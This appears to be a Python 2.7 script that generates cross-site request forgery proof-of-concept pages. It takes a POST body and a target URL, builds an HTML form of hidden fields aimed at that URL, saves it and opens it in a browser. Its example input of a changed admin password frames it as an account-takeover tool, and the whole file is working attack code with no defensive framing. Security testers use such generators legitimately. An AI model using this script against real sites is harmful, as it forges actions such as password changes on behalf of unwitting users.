#!/usr/bin/python2.7#CSRF-GENERATORimport timeimport osimport urllib,

1. #!/usr/bin/python2.7
2. #CSRF-GENERATOR
3.  
4. import time
5. import os
6. import urllib, webbrowser
7.  
8. global in_w
9. in_w = raw_input('POST reqest (e.g. name=admin&password=hacked123: ')
10.  
11. def parse_request(var=False,value=False,longz=False):
12.     input_request = in_w
13.     output_request = urllib.unquote(input_request)
14.     req_ = output_request.split('&')
15.     len_req = len(req_)
16.     var_list = []
17.     value_list = []
18.     for word in req_:
19.         parse_again = word.split('=')
20.         var_list.append(parse_again[0])
21.         value_list.append(parse_again[1])
22.     if var:
23.         return var_list
24.     if value:
25.         return value_list
26.     if longz:
27.         return len_req
28.        
29.    
30. def generate_csrf_poc(target_url):
31.     varz = parse_request(True,False,False)
32.     valuez = parse_request(False,True,False)
33.     html_payload = '<html>\n<body>\n<form action="%s" method="POST" />\n' % (target_url)
34.     how_much = parse_request(False,False,True)
35.     for i in xrange(how_much):
36.         html_payload += '<input type="hidden" name ="%s" value="%s"/>\n' % (varz[i],valuez[i])
37.     html_payload += '<input type="submit" value="csrf"/>'
38.     html_payload += '\n</form>\n</body>\n</html>'
39.     return html_payload
40.  
41.  
42. def main():
43.     ask_for_url = raw_input('url adress: ')
44.     f_name = str(time.time())
45.     csrf_file = open(f_name+'.html','w')
46.     print generate_csrf_poc(ask_for_url)
47.     path = os.path.abspath(f_name+'.html')
48.     print 'csrf file:',path
49.     csrf_file.write(generate_csrf_poc(ask_for_url))
50.     csrf_file.close()
51.     webbrowser.open(path)
52.  
53.  
54. main()